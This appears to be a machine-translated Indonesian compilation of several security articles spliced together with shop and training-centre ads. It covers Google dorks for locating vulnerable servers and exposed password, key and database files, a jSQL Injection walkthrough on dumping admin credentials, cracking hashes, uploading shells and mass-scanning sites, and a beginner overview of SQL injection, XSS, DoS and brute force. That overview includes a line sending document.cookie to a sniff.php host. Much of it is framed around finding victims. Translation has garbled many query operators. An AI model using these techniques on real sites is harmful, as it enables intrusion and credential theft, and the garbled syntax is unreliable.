Administrator yang berpengalaman dapat mengubah informasi ini, tetapi, biasanya, itu benar. Jadi, untuk mendapatkan informasi ini, cukup mengirim permintaan:

intitle: index.of server.at

Untuk mendapatkan informasi untuk server tertentu, kami menyaring permintaan:

intitle:index.dari server.at situs:ibm.com

Atau sebaliknya, kami mencari server yang berjalan pada versi server tertentu:

intitle:index.of Apache/2.0.40 Server di

Teknik ini bisa digunakan oleh seorang hacker untuk mencari korban. Jika, misalnya, dia memiliki exploit untuk versi tertentu dari server WEB, maka dia dapat menemukannya dan mencoba exploit yang ada.

Anda juga bisa mendapatkan versi server dengan melihat halaman yang terinstal secara default saat menginstal versi terbaru dari server WEB. Misalnya, untuk melihat halaman pengujian Apache 1.2.6, cukup ketik

intitle:Test.Page.for.Apache berhasil!

Selain itu, beberapa sistem operasi segera menginstal dan meluncurkan server WEB selama penginstalan. Namun, beberapa pengguna bahkan tidak menyadari hal ini. Secara alami, jika Anda melihat seseorang belum menghapus halaman default, masuk akal untuk berasumsi bahwa komputer belum mengalami konfigurasi apa pun dan mungkin rentan terhadap serangan.

Coba cari halaman IIS 5.0

allintitle:Selamat datang di Layanan Internet Windows 2000

Dalam kasus IIS, Anda tidak hanya dapat menentukan versi server, tetapi juga Versi Windows dan paket layanan.

Cara lain untuk menentukan versi server WEB adalah dengan mencari manual (halaman bantuan) dan contoh yang dapat dipasang di situs secara default. Peretas telah menemukan beberapa cara untuk menggunakan komponen ini untuk mendapatkan akses istimewa ke situs. Itu sebabnya Anda perlu menghapus komponen ini di lokasi produksi. Belum lagi dengan adanya komponen tersebut Anda bisa mendapatkan informasi tentang jenis server dan versinya. Sebagai contoh, mari temukan manual apache:

inurl: modul arahan manual apache

Menggunakan Google sebagai pemindai CGI.

Pemindai CGI atau pemindai WEB adalah utilitas untuk mencari skrip dan program yang rentan di server korban. Utilitas ini perlu mengetahui apa yang harus dicari, untuk ini mereka memiliki daftar lengkap file yang rentan, misalnya:

/cgi-bin/cgiemail/uargg.txt
/random_banner/index.cgi
/random_banner/index.cgi
/cgi-bin/mailview.cgi
/cgi-bin/maillist.cgi
/cgi-bin/userreg.cgi

/iissamples/ISSamples/SQLQHit.asp
/SiteServer/admin/findvserver.asp
/scripts/cphost.dll
/cgi-bin/finger.cgi

Kami dapat menemukan setiap file ini menggunakan Google, selain itu menggunakan kata indeks atau inurl dengan nama file di bilah pencarian: kami dapat menemukan situs dengan skrip yang rentan, misalnya:

allinurl:/random_banner/index.cgi

Dengan pengetahuan tambahan, seorang peretas dapat mengeksploitasi kerentanan skrip dan menggunakan kerentanan tersebut untuk memaksa skrip melayani file apa pun yang disimpan di server. Misalnya file kata sandi.

Bagaimana melindungi diri Anda dari peretasan melalui Google.

1. Jangan mengunggah data penting ke server WEB.

Meskipun Anda memposting data untuk sementara, Anda dapat melupakannya atau seseorang akan memiliki waktu untuk menemukan dan mengambil data ini sebelum Anda menghapusnya. Jangan lakukan itu. Ada banyak cara lain untuk mentransfer data yang melindunginya dari pencurian.

2. Periksa situs Anda.

Gunakan metode yang dijelaskan untuk meneliti situs Anda. Periksa situs Anda secara berkala untuk metode baru yang muncul di situs http://johnny.ihackstuff.com. Ingatlah bahwa jika Anda ingin mengotomatiskan tindakan Anda, Anda perlu mendapatkan izin khusus dari Google. Jika Anda hati-hati membaca http://www.google.com/terms_of_service.html, maka Anda akan melihat frasa: Anda tidak boleh mengirimkan kueri otomatis dalam bentuk apa pun ke sistem Google tanpa izin tersurat sebelumnya dari Google.

3. Anda mungkin tidak memerlukan Google untuk mengindeks situs Anda atau sebagian darinya.

Google memungkinkan Anda menghapus tautan ke situs Anda atau sebagian dari basis datanya, serta menghapus halaman dari cache. Selain itu, Anda dapat melarang pencarian gambar di situs Anda, melarang tampilan fragmen halaman pendek di hasil pencarian Semua kemungkinan untuk menghapus situs dijelaskan di halaman http://www.google.com/remove.html. Untuk melakukan ini, Anda harus mengonfirmasi bahwa Anda benar-benar pemilik situs ini atau menyisipkan tag pada halaman atau

4. Gunakan robots.txt

Diketahui bahwa mesin pencari melihat file robots.txt di root situs dan tidak mengindeks bagian yang ditandai dengan kata tersebut Melarang. Anda dapat menggunakan ini untuk mencegah bagian dari situs diindeks. Misalnya, untuk menghindari pengindeksan seluruh situs, buat file robots.txt yang berisi dua baris:

Agen pengguna: *
larang: /

Apa lagi yang terjadi

Agar hidup tidak tampak seperti madu bagi Anda, pada akhirnya saya akan mengatakan bahwa ada situs yang mengikuti orang-orang yang, dengan menggunakan metode di atas, mencari lubang di skrip dan server WEB. Contoh dari halaman tersebut adalah

Lampiran.

Sedikit manis. Coba salah satu dari yang berikut ini untuk Anda sendiri:

1. #mysql dump filetype:sql - mencari database dump data mySQL
2. Laporan Rangkuman Kerentanan Host - akan menunjukkan kepada Anda kerentanan yang ditemukan orang lain
3. phpMyAdmin berjalan di inurl:main.php - ini akan menutup paksa kontrol melalui panel phpmyadmin
4. Tidak untuk dibagikan secara rahasia
5. Detail Permintaan Mengontrol Variabel Server Pohon
6. Berjalan dalam mode anak
7. Laporan ini dihasilkan oleh WebLog
8. intitle: index.of cgiirc.config
9. filetype:conf inurl:firewall -intitle:cvs - mungkin seseorang membutuhkan file konfigurasi firewall? :)
10. intitle: index.of finances.xls - hmm....
11. intitle: Indeks obrolan dbconvert.exe - log obrolan icq
12. intext: analisis lalu lintas Tobias Oetiker
13. intitle:Statistik Penggunaan untuk Dihasilkan oleh Webalizer
14. intitle:statistik statistik web tingkat lanjut
15. intitle:index.of ws_ftp.ini - ws ftp config
16. inurl:ipsec.secrets menyimpan rahasia bersama - kunci rahasia - penemuan yang bagus
17. inurl:main.php Selamat datang di phpMyAdmin
18. inurl:server-info Informasi Server Apache
19. situs: nilai admin edu
20. ORA-00921: akhir tak terduga dari perintah SQL - dapatkan jalur
21. intitle: index.of trillian.ini
22. intitle: Indeks pwd.db
23. intitle: index.of people.lst
24. intitle: index.of master.passwd
25.inurl:passlist.txt
26. intitle: Indeks dari .mysql_history
27. intitle:indeks dari intext:globals.inc
28. intitle: index.of administrators.pwd
29. intitle:Index.of dll bayangan
30. intitle: index.of secring.pgp
31. inurl:config.php dbuname dbpass
32. inurl:lakukan tipe file:ini

  • "Meretas mit Google"
  • Pusat pelatihan "Informzaschita" http://www.itsecurity.ru - pusat khusus terkemuka di bidang pendidikan informasi keamanan(Lisensi Komite Pendidikan Moskow No. 015470, Akreditasi Negara No. 004251). Satu-satunya pusat pelatihan resmi Sistem Keamanan Internet dan Clearswift di Rusia dan negara-negara CIS. Pusat pelatihan resmi Microsoft (Spesialisasi keamanan). Program pelatihan dikoordinasikan dengan Komisi Teknis Negara Rusia, FSB (FAPSI). Sertifikat pelatihan dan dokumen negara tentang pelatihan lanjutan.

    SoftKey adalah layanan unik untuk pembeli, pengembang, dealer, dan mitra afiliasi. Selain itu, ini adalah salah satu toko perangkat lunak online terbaik di Rusia, Ukraina, Kazakhstan, yang menawarkan kepada pelanggan berbagai macam, banyak metode pembayaran, pemrosesan pesanan yang cepat (seringkali instan), melacak proses pemenuhan pesanan di bagian pribadi, berbagai diskon dari toko dan produsen AKTIF.

    Jalankan file yang diunduh klik dua kali(Harus punya mesin virtual ).

    3. Anonimitas saat memeriksa situs untuk injeksi SQL

    Menyiapkan Tor dan Privoxy di Kali Linux

    [Bagian dalam pengembangan]

    Menyiapkan Tor dan Privoxy di Windows

    [Bagian dalam pengembangan]

    pengaturan proksi jSQL Injection

    [Bagian dalam pengembangan]

    4. Memeriksa situs injeksi SQL dengan jSQL Injection

    Bekerja dengan program ini sangat sederhana. Cukup masukkan alamat situs dan tekan ENTER.

    Tangkapan layar berikut menunjukkan bahwa situs tersebut rentan terhadap tiga jenis injeksi SQL sekaligus (informasi tentangnya ditunjukkan di pojok kanan bawah). Dengan mengklik nama suntikan, Anda dapat mengganti metode yang digunakan:

    Juga, kami telah menampilkan database yang ada.

    Anda dapat melihat isi dari setiap tabel:

    Biasanya, bagian paling menarik dari tabel adalah kredensial administrator.

    Jika Anda beruntung dan menemukan data administrator, terlalu dini untuk bersukacita. Anda juga perlu menemukan panel admin, tempat memasukkan data ini.

    5. Cari admin dengan jSQL Injection

    Untuk melakukan ini, buka tab berikutnya. Di sini kita bertemu dengan daftar kemungkinan alamat. Anda dapat memilih satu atau beberapa halaman untuk diperiksa:

    Kenyamanannya adalah Anda tidak perlu menggunakan program lain.

    Sayangnya, tidak banyak programmer ceroboh yang menyimpan kata sandi dalam bentuk teks biasa. Cukup sering di string kata sandi kita melihat sesuatu seperti

    8743b52063cd84097a65d1633f5c74f5

    Ini hash. Anda dapat mendekripsi dengan kekerasan. Dan… jSQL Injection memiliki brute-forcer bawaan.

    6. Brute-forcing hash dengan jSQL Injection

    Kenyamanan yang tidak diragukan lagi adalah Anda tidak perlu mencari program lain. Ada dukungan untuk banyak hash paling populer.

    Ini bukan pilihan terbaik. Untuk menjadi ahli dalam menguraikan hash, buku "" dalam bahasa Rusia direkomendasikan.

    Tapi, tentu saja, ketika tidak ada program lain atau tidak ada waktu untuk belajar, jSQL Injection dengan fungsi brute-force bawaan akan berguna.

    Ada pengaturan: Anda dapat mengatur karakter mana yang termasuk dalam kata sandi, rentang panjang kata sandi.

    7. Operasi file setelah deteksi injeksi SQL

    Selain operasi dengan database - membaca dan memodifikasinya, jika injeksi SQL terdeteksi, operasi file berikut dapat dilakukan:

    • membaca file di server
    • mengunggah file baru ke server
    • mengunggah kerang ke server

    Dan semua ini diimplementasikan dalam jSQL Injection!

    Ada batasan - server SQL harus memiliki hak istimewa file. Wajar administrator sistem mereka dinonaktifkan dan akses ke berkas sistem tidak dapat diperoleh.

    Kehadiran hak istimewa file cukup mudah untuk diperiksa. Buka salah satu tab (membaca file, membuat shell, mengunggah file baru) dan coba lakukan salah satu operasi yang ditunjukkan.

    Catatan lain yang sangat penting - kita perlu mengetahui jalur absolut yang tepat ke file yang akan kita gunakan untuk bekerja - jika tidak, tidak akan ada yang berhasil.

    Lihat tangkapan layar berikut:

    Setiap upaya untuk mengoperasikan file dijawab oleh: Tidak ada hak istimewa FILE(tidak ada hak istimewa file). Dan tidak ada yang bisa dilakukan di sini.

    Jika sebaliknya Anda memiliki kesalahan lain:

    Masalah saat menulis ke [nama_direktori]

    Ini berarti Anda salah menentukan jalur absolut tempat Anda ingin menulis file.

    Untuk mengasumsikan jalur absolut, setidaknya seseorang harus tahu sistem operasi di mana server sedang berjalan. Untuk melakukan ini, alihkan ke tab Jaringan.

    Entri seperti itu (string Win64) memberi kami alasan untuk berasumsi bahwa kami berurusan dengan OS Windows:

    Keep-Alive: timeout=5, max=99 Server: Apache/2.4.17 (Win64) PHP/7.0.0RC6 Koneksi: Keep-Alive Metode: HTTP/1.1 200 OK Content-Length: 353 Tanggal: Jum, 11 Des 2015 11:48:31 GMT X-Powered-By: PHP/7.0.0RC6 Content-Type: text/html; charset=UTF-8

    Di sini kami memiliki beberapa Unix (*BSD, Linux):

    Transfer-Encoding: chunked Tanggal: Fri, 11 Des 2015 11:57:02 GMT Metode: HTTP/1.1 200 OK Keep-Alive: timeout=3, max=100 Connection: keep-alive Content-Type: text/html X- Didukung oleh: PHP/5.3.29 Server: Apache/2.2.31 (Unix)

    Dan di sini kita memiliki CentOS:

    Metode: HTTP/1.1 200 OK Kedaluwarsa: Kam, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/ Koneksi: keep-alive X-Cache-Lookup: MISS from t1.hoster.ru:6666 Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Cache: MISS from t1.hoster.ru Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Tanggal: Jum, 11 Des 2015 12:08:54 GMT Transfer-Encoding: Tipe-Konten terpotong: teks/html; charset=WINDOWS-1251

    Di Windows, folder situs tipikal adalah C:\Server\data\htdocs\. Namun nyatanya, jika seseorang "berpikir" untuk membuat server di Windows, kemungkinan besar orang tersebut belum pernah mendengar apapun tentang hak istimewa. Karena itu, Anda harus mulai mencoba langsung dari direktori C: / Windows /:

    Seperti yang Anda lihat, semuanya berjalan dengan sempurna untuk pertama kalinya.

    Tapi cangkang jSQL Injection itu sendiri menimbulkan keraguan saya. Jika Anda memiliki hak istimewa file, Anda dapat mengunggah sesuatu dengan antarmuka web.

    8. Situs pengecekan massal untuk injeksi SQL

    Dan bahkan jSQL Injection memiliki fitur ini. Semuanya sangat sederhana - unggah daftar situs (dapat diimpor dari file), pilih yang ingin Anda periksa dan klik tombol yang sesuai untuk memulai operasi.

    Keluaran oleh jSQL Injection

    jSQL Injection adalah alat yang bagus dan ampuh untuk menemukan dan kemudian menggunakan suntikan SQL yang ditemukan di situs. Keunggulannya yang tidak diragukan lagi: kemudahan penggunaan, fungsi terkait bawaan. jSQL Injection bisa menjadi sahabat pemula saat menganalisis situs web.

    Dari kekurangannya, saya perhatikan ketidakmungkinan mengedit database (setidaknya saya tidak menemukan fungsi ini). Seperti halnya semua alat dengan antarmuka grafis, ketidakmampuan untuk menggunakan skrip dapat dikaitkan dengan kerugian dari program ini. Namun demikian, beberapa otomatisasi juga dimungkinkan dalam program ini - berkat fungsi pemeriksaan situs massal bawaan.

    jSQL Injection jauh lebih nyaman digunakan daripada sqlmap . Tetapi sqlmap mendukung lebih banyak jenis injeksi SQL, memiliki opsi firewall file, dan beberapa fitur lainnya.

    Intinya: jSQL Injection adalah sahabat hacker pemula.

    Anda dapat menemukan bantuan untuk program ini di Ensiklopedia Kali Linux di halaman ini: http://kali.tools/?p=706

    Saya memutuskan untuk berbicara sedikit tentang keamanan informasi. Artikel ini akan bermanfaat bagi pemrogram pemula dan mereka yang baru mulai melakukan pengembangan Frontend. Apa masalahnya?

    Banyak pengembang pemula sangat kecanduan menulis kode sehingga mereka benar-benar melupakan keamanan pekerjaan mereka. Dan yang terpenting, mereka melupakan kerentanan seperti kueri SQL, XXS. Mereka juga membuat kata sandi yang mudah untuk panel administrasi mereka dan mengalami kekerasan. Serangan apa ini dan bagaimana cara menghindarinya?

    Injeksi SQL

    Injeksi SQL adalah jenis serangan basis data yang paling umum yang dilakukan dengan kueri SQL untuk DBMS tertentu. Banyak orang dan bahkan perusahaan besar menderita serangan tersebut. Alasannya adalah kesalahan pengembang saat menulis database dan, sebenarnya, kueri SQL.

    Serangan tipe injeksi SQL dimungkinkan karena pemrosesan input data yang salah yang digunakan dalam kueri SQL. Dengan serangan yang berhasil oleh peretas, Anda berisiko kehilangan tidak hanya konten basis data, tetapi juga kata sandi dan log panel administratif. Dan data ini akan cukup untuk mengambil alih situs sepenuhnya atau membuat penyesuaian yang tidak dapat diubah.

    Serangan dapat berhasil direproduksi dalam skrip yang ditulis dalam PHP, ASP, Perl, dan bahasa lainnya. Keberhasilan serangan tersebut lebih bergantung pada DBMS mana yang digunakan dan bagaimana skenario itu sendiri diimplementasikan. Ada banyak situs rentan untuk injeksi SQL di dunia. Ini mudah diverifikasi. Cukup memasukkan "dorks" - ini adalah permintaan khusus untuk menemukan situs yang rentan. Berikut beberapa di antaranya:

    • inurl:index.php?id=
    • inurl:pelatih.php?id=
    • inurl: beli.php?kategori=
    • inurl:artikel.php?ID=
    • inurl:play_old.php?id=
    • inurl:declaration_more.php?decl_id=
    • inurl:pageid=
    • inurl:games.php?id=
    • inurl:halaman.php?file=
    • inurl:newsDetail.php?id=
    • inurl:gallery.php?id=
    • inurl:artikel.php?id=

    Bagaimana cara menggunakannya? Cukup memasukkannya ke mesin pencari Google atau Yandex. Mesin pencari tidak hanya memberi Anda situs yang rentan, tetapi juga halaman untuk kerentanan ini. Namun kami tidak akan berhenti di situ dan memastikan bahwa halaman tersebut benar-benar rentan. Untuk ini, cukup beri tanda kutip tunggal "'" setelah nilai "id=1". Sesuatu seperti ini:

    • inurl:games.php?id=1'

    Dan situs tersebut akan memberi kami kesalahan tentang kueri SQL. Apa yang dibutuhkan peretas kita selanjutnya?

    Dan kemudian dia membutuhkan tautan ini ke halaman dengan kesalahan. Kemudian bekerja pada kerentanan dalam banyak kasus terjadi di distribusi "Kali linux" dengan utilitasnya untuk bagian ini: pengenalan kode injeksi dan kinerja operasi yang diperlukan. Bagaimana ini akan terjadi, saya tidak bisa memberi tahu Anda. Tetapi Anda dapat menemukan informasi tentang ini di Internet.

    Serangan XSS

    Jenis serangan ini dilakukan pada Kue. Mereka, pada gilirannya, sangat suka menyelamatkan pengguna. Kenapa tidak? Bagaimana tanpa mereka? Lagi pula, terima kasih kepada Cookies, kami tidak memasukkan kata sandi dari Vk.com atau Mail.ru ratusan kali. Dan tidak sedikit yang menolaknya. Namun di Internet, aturan sering muncul untuk peretas: koefisien kenyamanan berbanding lurus dengan koefisien ketidakamanan.

    Untuk menerapkan serangan XSS, peretas kami membutuhkan pengetahuan JavaScript. Sekilas bahasanya sangat sederhana dan tidak berbahaya, karena tidak memiliki akses ke sumber daya komputer. Seorang peretas dapat bekerja dengan JavaScript hanya di browser, tetapi itu sudah cukup. Lagi pula, yang utama adalah memasukkan kode ke halaman web.

    Saya tidak akan merinci tentang proses penyerangan. Saya hanya akan memberi tahu dasar-dasar dan arti bagaimana ini terjadi.

    Seorang peretas dapat menambahkan kode JS ke beberapa forum atau buku tamu:

    Skrip mengarahkan kita ke halaman yang terinfeksi tempat kode akan dieksekusi: baik itu pelacak, semacam penyimpanan, atau eksploit yang entah bagaimana akan mencuri Cookie kita dari cache.

    Mengapa JavaScript? Karena JavaScript hebat dengan permintaan web dan memiliki akses ke cookie. Tetapi jika skrip kami akan mentransfer kami ke beberapa situs, maka pengguna akan dengan mudah melihat ini. Di sini, peretas menggunakan opsi yang lebih licik - dia cukup memasukkan kode ke dalam gambar.

    Img=gambarBaru();

    Img.src=” http://192.168.1.7/sniff.php?”+document.cookie;

    Kami cukup membuat gambar dan menetapkan skrip kami sebagai alamat.

    Bagaimana cara melindungi diri Anda dari semua ini? Sangat sederhana - jangan ikuti tautan yang mencurigakan.

    Serangan DoS dan DDos


    DoS (dari Bahasa Inggris Denial of Service - Kegagalan layanan) serangan hacker pada sistem komputer untuk membawanya ke kegagalan. Ini adalah penciptaan kondisi di mana pengguna sistem yang teliti tidak dapat mengakses yang disediakan sumber daya sistem(server), atau akses ini sulit. Kegagalan sistem juga dapat menjadi langkah menuju penangkapannya jika, dalam situasi darurat, perangkat lunak memberikan informasi penting apa pun: misalnya, versi, bagian dari kode program, dll. Tetapi paling sering ini adalah ukuran dari tekanan ekonomi: hilangnya layanan sederhana yang menghasilkan pendapatan. Tagihan dari penyedia atau langkah-langkah untuk menghindari serangan secara signifikan mengenai "target" di saku. Saat ini, serangan DoS dan DDoS adalah yang paling populer, karena memungkinkan Anda untuk membuat hampir semua sistem gagal tanpa meninggalkan bukti yang signifikan secara hukum.

    Apa perbedaan antara serangan DoS dan DDos?

    DoS adalah serangan yang dibangun dengan cara yang cerdas. Misalnya, jika server tidak memeriksa kebenaran paket yang masuk, peretas dapat membuat permintaan yang akan diproses selamanya, dan tidak akan ada cukup waktu prosesor untuk bekerja dengan koneksi lain. Dengan demikian, pelanggan akan menerima penolakan layanan. Tetapi tidak akan berhasil membebani atau menonaktifkan situs besar terkenal dengan cara ini. Mereka dipersenjatai dengan saluran yang cukup luas dan server yang sangat kuat yang dapat dengan mudah mengatasi kelebihan beban tersebut.

    DDoS sebenarnya adalah serangan yang sama dengan DoS. Tetapi jika di DoS ada satu paket permintaan, maka di DDoS mungkin ada ratusan atau lebih. Bahkan server tugas berat mungkin tidak dapat mengatasi kelebihan beban tersebut. Saya akan memberi Anda sebuah contoh.

    Serangan DoS terjadi ketika Anda sedang bercakap-cakap dengan seseorang, tetapi kemudian beberapa orang yang tidak sopan muncul dan mulai berteriak dengan keras. Berbicara tidak mungkin atau sangat sulit. Solusi: panggil keamanan, yang akan menenangkan dan membawa orang tersebut keluar ruangan. Serangan DDoS terjadi ketika ribuan orang yang tidak sopan masuk. Dalam hal ini, para penjaga tidak akan dapat memelintir dan membawa semua orang pergi.

    DoS dan DDoS diproduksi dari komputer, yang disebut zombie. Ini adalah komputer pengguna yang diretas oleh peretas yang bahkan tidak curiga bahwa mesin mereka terlibat dalam serangan server mana pun.

    Bagaimana cara melindungi diri Anda dari ini? Secara umum, tidak mungkin. Tapi Anda bisa memperumit tugas seorang peretas. Untuk melakukan ini, Anda harus memilih hosting yang bagus dengan server yang kuat.

    Serangan membabi buta

    Pengembang dapat membuat banyak sistem perlindungan serangan, meninjau sepenuhnya skrip yang telah kami tulis, memeriksa kerentanan situs, dll. Namun ketika sampai pada langkah terakhir tata letak situs, yaitu ketika baru saja memasukkan kata sandi di panel admin, dia bisa melupakan satu hal. Kata sandi!

    Sangat tidak disarankan untuk menetapkan kata sandi sederhana. Itu bisa 12345, 1114457, vasya111, dll. Tidak disarankan untuk mengatur kata sandi dengan panjang kurang dari 10-11 karakter. Jika tidak, Anda mungkin terkena serangan yang paling umum dan tidak rumit - Brute Force.

    Brute force adalah serangan brute force kata sandi berbasis kamus menggunakan program khusus. Kamus bisa berbeda: Latin, mengurutkan berdasarkan angka, katakanlah hingga beberapa rentang, campuran (Latin + angka), dan bahkan ada kamus dengan simbol unik @#4$%&*~~`'”\ ? dll.

    Tentu saja, jenis serangan ini mudah dihindari, cukup dengan membuat kata sandi yang rumit. Bahkan captcha dapat menyelamatkan Anda. Dan juga, jika situs Anda dibuat di CMS, maka banyak dari mereka menghitung jenis serangan dan pemblokiran ip yang serupa. Kita harus selalu ingat bahwa semakin banyak karakter berbeda dalam kata sandi, semakin sulit untuk mengambilnya.

    Bagaimana cara kerja peretas? Dalam kebanyakan kasus, mereka mencurigai atau sudah mengetahui sebagian dari kata sandi. Cukup logis untuk mengasumsikan bahwa kata sandi pengguna pasti tidak terdiri dari 3 atau 5 karakter. Kata sandi semacam itu sering menyebabkan peretasan. Pada dasarnya, peretas mengambil rentang 5 hingga 10 karakter dan menambahkan beberapa karakter di sana yang mungkin sudah mereka ketahui sebelumnya. Selanjutnya, buat kata sandi dengan rentang yang diinginkan. Distribusi Kali linux bahkan memiliki program untuk kasus seperti itu. Dan voila, serangan itu tidak akan bertahan lama, karena volume kamusnya tidak lagi besar. Selain itu, seorang peretas dapat menggunakan kekuatan kartu video. Beberapa dari mereka mendukung sistem CUDA, sementara kecepatan pencacahan meningkat sebanyak 10 kali lipat. Dan sekarang kita melihat bahwa serangan itu dengan cara sederhana cukup nyata. Tetapi tidak hanya situs yang mengalami kekerasan.

    Pengembang yang terhormat, jangan pernah melupakan sistem keamanan informasi, karena saat ini banyak orang, termasuk negara bagian, menderita jenis serangan seperti itu. Bagaimanapun, kerentanan terbesar adalah orang yang selalu dapat dialihkan perhatiannya ke suatu tempat atau diabaikan di suatu tempat. Kami adalah pemrogram, tetapi bukan mesin yang diprogram. Selalu waspada, karena hilangnya informasi mengancam konsekuensi serius!